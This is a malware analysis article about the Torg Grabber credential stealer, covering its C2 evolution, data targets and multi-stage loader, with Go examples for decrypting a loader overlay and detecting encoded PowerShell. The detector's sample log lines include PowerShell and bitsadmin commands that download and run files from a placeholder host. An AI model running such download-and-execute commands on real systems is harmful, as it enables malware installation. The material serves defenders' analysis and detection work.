A new Malware-as-a-Service (MaaS) credential stealer dubbed Torg Grabber has emerged, and in roughly three months it has moved from simple Telegram-based exfiltration to an encrypted, authenticated REST API command-and-control (C2) infrastructure. Identified by Gen Digital’s Threat Research Team, it is already being deployed by multiple criminal operators, which points to a scalable, builder-based enterprise rather than a single actor. The name comes from its most prominent C2 domain, technologytorg.com; “torg” is Russian for “trade” or “marketplace”, a fitting label for a commercial cybercrime tool.
Torg Grabber came to light when a sample was initially misclassified as Vidar Stealer. Closer analysis showed a different codebase: a 64-bit PE compiled with MinGW-GCC, where Vidar is a 32-bit MSVC build, with the debug string “grabber v1.0” left in the binary and encrypted, authenticated C2 communications that set it apart from the other known stealers. Together these point to an independent development path rather than a Vidar variant.
Torg Grabber’s Rapid Development and Evolving Exfiltration Methods
Torg Grabber’s development, as traced by Gen Digital, moved through distinct operational phases in quick succession. Early builds, active in December 2025, exfiltrated stolen data as ZIP archives through the Telegram Bot API. That approach needs no infrastructure of the operator’s own, but it leaves the bot token embedded in the sample, where analysts can recover it.
Between December 17 and 20, 2025, the malware briefly experimented with a raw TCP socket protocol that used a custom 9-byte binary frame and ChaCha20-Poly1305 authenticated encryption. A custom protocol on a raw socket is easy for a network sensor to fingerprint, and the design was soon dropped in favour of something more resilient.
From December 18, 2025, overlapping with the end of the TCP experiment, Torg Grabber switched to a production-grade REST API over HTTPS fronted by Cloudflare. Fronting through Cloudflare hides the IP addresses of the real C2 servers, so defenders cannot block or report the origin hosts by IP, and the traffic looks like ordinary TLS to a CDN that most networks already allow. It does not prevent blocking by domain name, which is why the C2 domains remain the most useful network indicators, but it does make the traffic far harder to single out or intercept than the earlier custom protocol.
Extensive Data Collection and Evasion Techniques
Torg Grabber exhibits a broad range of data collection capabilities, targeting sensitive information across numerous applications and platforms. It is designed to pilfer credentials from 25 distinct Chromium-based browsers and eight Firefox-family browsers. Additionally, it aggressively collects data from over 850 browser extensions, including those used for cryptocurrency wallets and two-factor authentication, making it a significant threat to financial assets.
Beyond browsers, Torg Grabber collects session data from Discord, Telegram and Steam, plus VPN configurations, FTP client credentials and desktop screenshots, which together give an operator both the victim’s online accounts and a route onto their networks. Before collecting anything it checks the host for at least 46 identifiers of security software spanning 24 products, so that the operator knows which defenses are present and can adapt evasion accordingly.
Evidence of the malware’s operational reach has been found in its binaries, with more than 40 confirmed operator tags. Eight of these tags have been linked to live Telegram accounts associated with Russian-speaking cybercrime networks, underscoring the organized nature of this operation and the community it serves.
The Loader Chain: A Multi-Stage Evasion Strategy
Torg Grabber is delivered through a multi-stage loader chain that peels away one layer of encryption or encoding at each step and executes the final payload in memory. Only the earlier stages ever exist as files, and those carry the stealer solely in encrypted form, so file-scanning antivirus never sees the decrypted stealer on disk.
Stage 0, the initial dropper, arrives disguised as fake game cheats or cracked software, or through ClickFix-style lures that trick the victim into pasting a command into the Run dialog or a terminal, with the payload hosted on services such as Google Apps Script. Once it runs, it typically launches a PowerShell command that creates a hidden Background Intelligent Transfer Service (BITS) job. The actual download is then performed by the BITS service, which runs inside `svchost.exe`, so the network connection originates from a signed Microsoft process rather than from the dropper and blends with routine Windows traffic.
Stage 1 is a self-extracting loader carrying an AES-256-CBC encrypted overlay, data appended after the last section of the PE file where the Windows loader never maps it. The loader reads the overlay, applies a custom hex decoding step and then AES decryption to recover the next stage. It also invokes native NT API functions through direct system calls rather than imported functions, so static analysis sees no revealing import table and the user-mode hooks that EDR products place in `ntdll.dll` are bypassed.
Stage 2 is a reflective PE loader that runs entirely in memory: it maps the stealer payload into an already-running process without writing any executable to disk. By the time Torg Grabber is active it is executing inside an existing process, which leaves endpoint tools nothing new to scan on disk and forces detection to rely on memory and behaviour.
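The Stage 1 overlay scheme is the part of the chain an analyst can reproduce statically. The Go program below is an added editor example, not Torg Grabber’s loader or Gen Digital’s tooling: it locates the overlay by computing the end of the last section from the PE section table, hex-decodes it and AES-CBC decrypts it. The 32-byte key, the assumption that the IV is the first 16 decoded bytes, PKCS#7 padding, the use of plain (not custom) hex, and the synthetic one-section PE used as input are all assumptions made for the example; the article does not document those details.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/binary"
	"encoding/hex"
	"errors"
	"fmt"
)

// OverlayOffset returns where the overlay begins: the end of the last section's raw
// data per the section table, which is the last byte the Windows loader will map.
func OverlayOffset(img []byte) (int, error) {
	if len(img) < 0x40 || string(img[:2]) != "MZ" {
		return 0, errors.New("not an MZ image")
	}
	pe := int(binary.LittleEndian.Uint32(img[0x3C:])) // e_lfanew
	if pe+24 > len(img) || string(img[pe:pe+4]) != "PE\x00\x00" {
		return 0, errors.New("bad PE signature")
	}
	nSec := int(binary.LittleEndian.Uint16(img[pe+6:]))              // COFF NumberOfSections
	secTab := pe + 24 + int(binary.LittleEndian.Uint16(img[pe+20:])) // skip SizeOfOptionalHeader
	if secTab+nSec*40 > len(img) {                                   // 40-byte IMAGE_SECTION_HEADERs
		return 0, errors.New("truncated section table")
	}
	end := 0
	for i := 0; i < nSec; i++ {
		h := secTab + i*40
		rawSz := int(binary.LittleEndian.Uint32(img[h+16:]))  // SizeOfRawData
		rawPtr := int(binary.LittleEndian.Uint32(img[h+20:])) // PointerToRawData
		if rawPtr+rawSz > end {
			end = rawPtr + rawSz
		}
	}
	if end == 0 || end > len(img) {
		return 0, errors.New("no section data, or section data past EOF")
	}
	return end, nil
}

// DecryptOverlay hex-decodes the overlay, CBC-decrypts it with the first block as IV
// and strips PKCS#7 padding. IV placement and padding are assumptions of this example.
func DecryptOverlay(overlay []byte, blk cipher.Block) ([]byte, error) {
	raw, err := hex.DecodeString(string(bytes.TrimSpace(overlay)))
	if err != nil {
		return nil, fmt.Errorf("hex decode: %w", err)
	}
	bs := blk.BlockSize()
	if len(raw) < 2*bs || len(raw)%bs != 0 {
		return nil, errors.New("ciphertext is not IV plus whole blocks")
	}
	pt := make([]byte, len(raw)-bs)
	cipher.NewCBCDecrypter(blk, raw[:bs]).CryptBlocks(pt, raw[bs:])
	pad := int(pt[len(pt)-1])
	if pad == 0 || pad > bs || !bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return nil, errors.New("bad PKCS#7 padding: wrong key or corrupted overlay")
	}
	return pt[:len(pt)-pad], nil
}

// EncryptForSample is the inverse of DecryptOverlay with a fixed IV; it only builds fixture input.
func EncryptForSample(pt []byte, blk cipher.Block) []byte {
	pad := blk.BlockSize() - len(pt)%blk.BlockSize()
	padded := append(append([]byte{}, pt...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	iv := []byte("constructed-iv16") // 16 bytes, the AES block size
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(blk, iv).CryptBlocks(ct, padded)
	return []byte(hex.EncodeToString(append(iv, ct...)))
}

// BuildSample makes a minimal, non-executable one-section PE with hexOverlay appended
// after the section data. It is a constructed fixture, not a real Torg Grabber sample.
func BuildSample(hexOverlay []byte) []byte {
	const peOff, optSz = 0x40, 0xF0
	img := make([]byte, peOff+4+20+optSz+40) // DOS hdr, PE sig, COFF hdr, optional hdr, 1 section hdr
	copy(img, "MZ")
	binary.LittleEndian.PutUint32(img[0x3C:], peOff)
	copy(img[peOff:], "PE\x00\x00")
	binary.LittleEndian.PutUint16(img[peOff+6:], 1)      // NumberOfSections
	binary.LittleEndian.PutUint16(img[peOff+20:], optSz) // SizeOfOptionalHeader (contents left zeroed)
	data := []byte("section data placeholder")
	sec := img[peOff+24+optSz:]
	copy(sec, ".text")
	binary.LittleEndian.PutUint32(sec[16:], uint32(len(data))) // SizeOfRawData
	binary.LittleEndian.PutUint32(sec[20:], uint32(len(img)))  // PointerToRawData: right after headers
	return append(append(img, data...), hexOverlay...)
}

func main() {
	blk, _ := aes.NewCipher([]byte("0123456789abcdef0123456789abcdef")) // constructed 32-byte key
	img := BuildSample(EncryptForSample([]byte("stage 2 reflective loader stub"), blk))
	off, _ := OverlayOffset(img)
	pt, err := DecryptOverlay(img[off:], blk)
	fmt.Printf("overlay at 0x%x (%d bytes): %q err=%v\n", off, len(img)-off, pt, err)
}
```

On a real Stage 1 binary you would read the file, call `OverlayOffset` to carve everything past the last section, and feed that to `DecryptOverlay` with the key recovered from the loader; the padding check is what tells you the key or IV layout guess was wrong, rather than silently returning garbage. Bounds checks on the section table matter because loaders frequently ship malformed headers that crash naive parsers.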
Given how quickly Torg Grabber is evolving, users should be wary of software from unofficial sources such as game cheat sites or cracked-application platforms, which is where its droppers are planted. Security teams should alert on PowerShell launched with `-EncodedCommand` (or an abbreviation such as `-enc`) and a base64 argument, and on new BITS transfer jobs, whether created through `Start-BitsTransfer`, `bitsadmin.exe` or recorded in the Microsoft-Windows-Bits-Client/Operational event log, especially when the job is created by a PowerShell process. Endpoint tools should be configured to flag direct syscall usage and in-memory PE loading.
Organizations running Chromium-based browsers should make sure App-Bound Encryption is enabled and in force; it ties the key protecting cookies and credentials to the browser’s own identity, which is why stealers now try to run code inside, or impersonate, the browser process. For the same reason, unexpected suspension of browser processes or other unusual browser behaviour during normal use should be treated as a potential indicator of compromise and investigated thoroughly. Torg Grabber’s steady adaptation means defenders need continued vigilance and proactive, behaviour-based controls rather than reliance on static signatures alone.
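The monitoring advice above (encoded PowerShell, BITS job creation, hidden windows) can be exercised against process-creation telemetry. The Go program below is an added editor example, not a detection from Gen Digital or any vendor: it decodes `-EncodedCommand` arguments (base64 over UTF-16LE, which is what powershell.exe expects), inspects the decoded script as well as the raw command line, and flags BITS and hidden-window indicators. The three Sysmon-style log records, the `example.invalid` URLs and the script they carry are constructed for the example; the `-e[a-z]*` prefix matching and the 16-character minimum for the base64 token are heuristics chosen here, not documented Torg Grabber traits.

```go
package main

import (
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
	"regexp"
	"strings"
	"unicode/utf16"
)

// encFlag matches powershell.exe's -EncodedCommand switch (any prefix: -e, -ec, -enc, ...)
// followed by a base64 token long enough to be a script rather than a short flag value.
var encFlag = regexp.MustCompile(`(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})`)

// Finding records why a process-creation log line was flagged.
type Finding struct {
	Line    int
	Reasons []string
	Decoded string // decoded -EncodedCommand payload, if any
}

// EncodeForPowerShell produces what -EncodedCommand expects: base64 over the
// UTF-16LE bytes of the script. Used here only to build the sample log lines.
func EncodeForPowerShell(script string) string {
	u := utf16.Encode([]rune(script))
	b := make([]byte, 2*len(u))
	for i, c := range u {
		binary.LittleEndian.PutUint16(b[2*i:], c)
	}
	return base64.StdEncoding.EncodeToString(b)
}

// DecodePowerShellEncoded reverses that encoding so the analyst can read the real script.
func DecodePowerShellEncoded(b64 string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(raw)%2 != 0 {
		return "", errors.New("not UTF-16LE: odd byte count")
	}
	u := make([]uint16, len(raw)/2)
	for i := range u {
		u[i] = binary.LittleEndian.Uint16(raw[2*i:])
	}
	return string(utf16.Decode(u)), nil
}

// Analyze applies the article's three checks to each command line: encoded PowerShell,
// BITS transfer requests (also inside the decoded script) and hidden-window flags.
func Analyze(lines []string) []Finding {
	var out []Finding
	for i, line := range lines {
		f := Finding{Line: i + 1}
		text := strings.ToLower(line)
		if m := encFlag.FindStringSubmatch(line); m != nil {
			if dec, err := DecodePowerShellEncoded(m[1]); err == nil {
				f.Decoded = dec
				text += " " + strings.ToLower(dec) // inspect the script, not just the base64
				f.Reasons = append(f.Reasons, "powershell -EncodedCommand")
			} else {
				f.Reasons = append(f.Reasons, "powershell -EncodedCommand (undecodable)")
			}
		}
		if strings.Contains(text, "start-bitstransfer") || strings.Contains(text, "bitsadmin") {
			f.Reasons = append(f.Reasons, "BITS transfer requested")
		}
		if strings.Contains(text, "-windowstyle hidden") || strings.Contains(text, "-w hidden") {
			f.Reasons = append(f.Reasons, "hidden window")
		}
		if len(f.Reasons) > 0 {
			out = append(out, f)
		}
	}
	return out
}

// SampleLines are constructed Sysmon-style process-creation records, not real telemetry.
func SampleLines() []string {
	stager := EncodeForPowerShell(`Start-BitsTransfer -Source https://example.invalid/s1.bin -Destination $env:TEMP\s1.bin; & $env:TEMP\s1.bin`)
	return []string{
		`Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  CommandLine: powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand ` + stager,
		`Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  CommandLine: powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1`,
		`Image: C:\Windows\System32\bitsadmin.exe  CommandLine: bitsadmin /transfer upd /download /priority high https://example.invalid/u.exe C:\Users\Public\u.exe`,
	}
}

func main() {
	for _, f := range Analyze(SampleLines()) {
		fmt.Printf("line %d: %s\n", f.Line, strings.Join(f.Reasons, "; "))
		if f.Decoded != "" {
			fmt.Printf("  decoded: %s\n", f.Decoded)
		}
	}
}
```

The benign second record (a signed-looking maintenance script run with `-ExecutionPolicy Bypass`) produces no finding, which is the point of decoding rather than alerting on any base64: the first record is flagged three times because the decoded script, not the raw command line, contains the BITS request. In production, correlate these hits with the BITS-Client operational log and with child-process lineage, since the download itself will appear to come from `svchost.exe`.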